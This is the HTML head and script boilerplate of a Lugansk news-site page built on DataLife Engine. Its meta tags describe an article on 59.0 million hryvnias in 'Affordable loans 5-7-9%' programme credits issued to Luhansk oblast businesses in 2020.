<meta property="og:title" content="За 2020 год в Луганской области по государственной программе «Доступные кредиты 5-7-9%» выдали 59,0 млн гривень ">
<meta property="og:url" content="http://www.citynews.net.ua/news/85732-za-2020-god-v-luganskoj-oblasti-po-gosudarstvennoj-programme-dostupnye-kredity-5-7-9-vydali-590-mln-griven-.html">
<meta property="og:image" content="http://www.citynews.net.ua/uploads/posts/2021-01/medium/1611907838_money.jpg">
<meta property="og:description" content="В прошлом году представители бизнеса Луганской области приняли участие в различных программах поддержки предпринимательства. По государственной программе «Доступные кредиты 5-7-9%» предприниматели в Луганской области получили кредиты со льготными процентами на сумму 59,0 млн гривен. Об этом">
<link rel="search" type="application/opensearchdescription+xml" href="http://www.citynews.net.ua/index.php?do=opensearch" title="Новости Луганска и Луганской области. Луганские новости сегодня">
<link rel="canonical" href="http://www.citynews.net.ua/news/85732-za-2020-god-v-luganskoj-oblasti-po-gosudarstvennoj-programme-dostupnye-kredity-5-7-9-vydali-590-mln-griven-.html">
<link rel="alternate" type="application/rss+xml" title="Новости Луганска и Луганской области. Луганские новости сегодня" href="http://www.citynews.net.ua/rss.xml">
<link href="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/editor/css/default.css&amp;v=25" rel="stylesheet" type="text/css">
<script src="/engine/classes/min/index.php?charset=utf-8&amp;g=general&amp;v=25"></script>
<script src="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/classes/js/jqueryui.js,engine/classes/js/dle_js.js&amp;v=25" defer></script>
<script>
<!--
var dle_root       = '/';
var dle_admin      = '';
var dle_login_hash = 'd5acbb30b3f3e4eafad0bc3dcca6741c053ac0ec';
var dle_group      = 5;
var dle_skin       = 'v2';
var dle_wysiwyg    = '2';
var quick_wysiwyg  = '0';
var dle_act_lang   = ["Да", "Нет", "Ввод", "Отмена", "Сохранить", "Удалить", "Загрузка. Пожалуйста, подождите..."];
var menu_short     = 'Быстрое редактирование';
var menu_full      = 'Полное редактирование';
var menu_profile   = 'Просмотр профиля';
var menu_send      = 'Отправить сообщение';
var menu_uedit     = 'Админцентр';
var dle_info       = 'Информация';
var dle_confirm    = 'Подтверждение';
var dle_prompt     = 'Ввод информации';
var dle_req_field  = 'Заполните все необходимые поля';
var dle_del_agree  = 'Вы действительно хотите удалить? Данное действие невозможно будет отменить';
var dle_spam_agree = 'Вы действительно хотите отметить пользователя как спамера? Это приведёт к удалению всех его комментариев';
var dle_complaint  = 'Укажите текст Вашей жалобы для администрации:';
var dle_big_text   = 'Выделен слишком большой участок текста.';
var dle_orfo_title = 'Укажите комментарий для администрации к найденной ошибке на странице';
var dle_p_send     = 'Отправить';
var dle_p_send_ok  = 'Уведомление успешно отправлено';
var dle_save_ok    = 'Изменения успешно сохранены. Обновить страницу?';
var dle_reply_title= 'Ответ на комментарий';
var dle_tree_comm  = '0';
var dle_del_news   = 'Удалить статью';
var dle_sub_agree  = 'Вы действительно хотите подписаться на комментарии к данной публикации?';
var allow_dle_delete_news   = false;

//-->
</script>
</body>
</html>
<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->
